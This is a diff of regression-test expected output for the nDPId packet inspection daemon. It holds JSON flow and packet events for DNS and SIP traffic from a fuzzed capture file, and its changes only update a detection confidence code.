+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470373593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470373595,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470385615,"flow_last_seen":1120470385615,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1120470385615,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470385615,"pkt":"ADBUADRWAODtAW69CABFAABIawQAAIARTE3AqAECwKgBAQrYADUANPsJLuMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470385615,"flow_last_seen":1120470385615,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470385615,"flow_last_seen":1120470385615,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1120470386610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470386610,"pkt":"ADBUADRWAODtAW69CABFAABIawUAAKARTEzAqAECwKgBAQrYADUANEcJLuMBAAABAAAAAAAABV9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470385615,"flow_last_seen":1120470386610,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470386610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470385615,"flow_last_seen":1120470386610,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470386610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":392,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470388613} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":392,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470386610,"pkt":"ADBUADSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1120470390616,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470390616,"pkt":"ADBUADRWAODtAW69CABFAABIawsAAIARTEbAqAECwKgBAQrYADUANPsJLuMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470385615,"flow_last_seen":1120470390616,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470390616,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470385615,"flow_last_seen":1120470390616,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470390616,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00881{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -721,43 +721,43 @@ 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1120470399719,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470399719,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOazwAJXMASxHAqAECwKgB\/wD+AIkAOltshS8BFAABAAAAAAAAIEVGRURFSkZQRUVFUEVOJXMASkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1120470402624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470402624,"pkt":"ADBUADRWAODtAW69CABFAABEaz0AAIARTBjAqCECwKgBAQreADUAMNT8T+QAAAABAAAAAAAAQTEBMAEwAzEyNwdpbi1hZGQgBGFycGEAAAwAAQ=="} 
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470402625,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1120470402625,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470402625,"pkt":"AeDtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Ct4AR7d4T+SAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470402625,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470402625,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1120470402627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":47,"pkt_l4_len":13,"thread_ts_msec":1120470402627,"pkt":"ADBUADRWAODtAW69CABFAAAhaz4AAIARF87AqAEG1PIhIxPEE8QADcBLICAgICA="} 00198{"error_event_id":5,"error_event_name":"Unknown packet 
type","datalink":1,"packet_id":401,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2566,"global_ts_msec":1120470407625} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":401,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2566,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1120470402627,"pkt":"AODtAW5nADBUADRWCgYAAQgABgQAAQAwVAA0VsCoAQEAAAAAAADAqAECiGQRAPY3AArAIQkOAAjPO\/nN"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1120470414647,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470414647,"pkt":"ADBUADRWAODtAW69CABFAABIa0oAAIARTAfAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAQhAAE="} 
-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1057,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1057,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1120470415643,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470415643,"pkt":"ADBUJXMAAODtAW69CABFAABIa0sAAIARTAbAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470414647,"flow_last_seen":1120470415643,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470415643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470414647,"flow_last_seen":1120470415643,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470415643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":405,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470417645} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":405,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470415643,"pkt":"ADBUADRWAOCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 